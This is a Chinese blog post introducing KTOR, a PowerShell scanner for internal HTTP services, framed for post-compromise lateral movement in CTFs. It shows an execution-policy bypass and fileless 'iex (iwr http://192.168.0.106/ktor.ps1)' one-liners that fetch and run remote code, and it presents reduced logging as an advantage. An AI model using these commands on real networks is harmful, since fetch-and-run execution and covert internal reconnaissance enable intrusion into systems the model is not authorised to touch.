当前位置: 首页 > news >正文

KTOR for windows:無文件落地HTTP服务扫描工具

地址:https://github.com/MartinxMax/KTOR

介紹

KTOR 是一款專為 Linux 橫向滲透設計的工具。透過該工具,您可以快速掃描內部 HTTP 服務,以便進一步進行網路滲透,並實現無檔案落地(fileless)掃描。

在 CTF 中,通常需要利用本機其他埠口的 HTTP 服務或其他主機上的 HTTP 服務來橫向移動並提升權限。

當取得目標機器的低權限後,通常會對內部網路進行進一步的探測;然而透過埠口轉發再進行掃描會相當耗時。為了解決這個問題,KTOR 可用來預先探測存在 HTTP 服務的主機,有效減少日誌產生。

KTOR for Windows

PS> Set-ExecutionPolicy Bypass -Scope Process -Force;.\ktor.ps1

wimage.png

掃描當前主機HTTP服務

PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Local"

wimage-1.png

掃描其他主機HTTP服務

PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Targets 192.168.0.106 -Ports 80,8080,8000"

wimage-2.png

相关文章:

  • SaaS场快订平台项目说明【持续更新】
  • window 显示驱动开发-AGP 类型伸缩空间段
  • [白话文] 从百草园RLHF到三味书屋DPO
  • HTTP 请求中 Content-Type 头部
  • GitHub 趋势日报 (2025年05月09日)
  • 部署dify
  • Web3 实战项目项目部署到 GitHub 和上线预览的完整指南
  • 数据库实验10
  • 多线程获取VI模块的YUV数据
  • ISP(Image Signal Processor)处理流程及不同域划分
  • 【计算机视觉】OpenCV实战项目:Deep Machine Learning Tutors:基于OpenCV的实时面部识别系统深度解析
  • Flink 运维监控与指标采集实战
  • 【前端】每日一道面试题3:如何实现一个基于CSS Grid的12列自适应布局?
  • Spring循环依赖问题
  • 单脉冲前视成像多目标分辨算法——论文阅读
  • 管道-验证和转换
  • 【Linux】冯诺依曼体系结构和操作系统的理解
  • 23、DeepSeekMath论文笔记(GRPO)
  • 【桌面】【输入法】常见问题汇总
  • 高精度之加减乘除之多解总结(加与减篇)
  • 海航回应“男团粉丝为追星堵住机舱通道”:已紧急阻止
  • 咸宁市委常委、市纪委书记官书云调任湖北省司法厅副厅长
  • 丰田汽车:美国关税或导致4、5月损失1800亿日元,新财年净利润下滑三成
  • 中国海警依法驱离日非法进入我钓鱼岛领海船只
  • 中俄领导人将讨论从俄罗斯经蒙古至中国天然气管道项目?外交部回应
  • 外交部回应中美经贸高层会谈:这次会谈是应美方请求举行的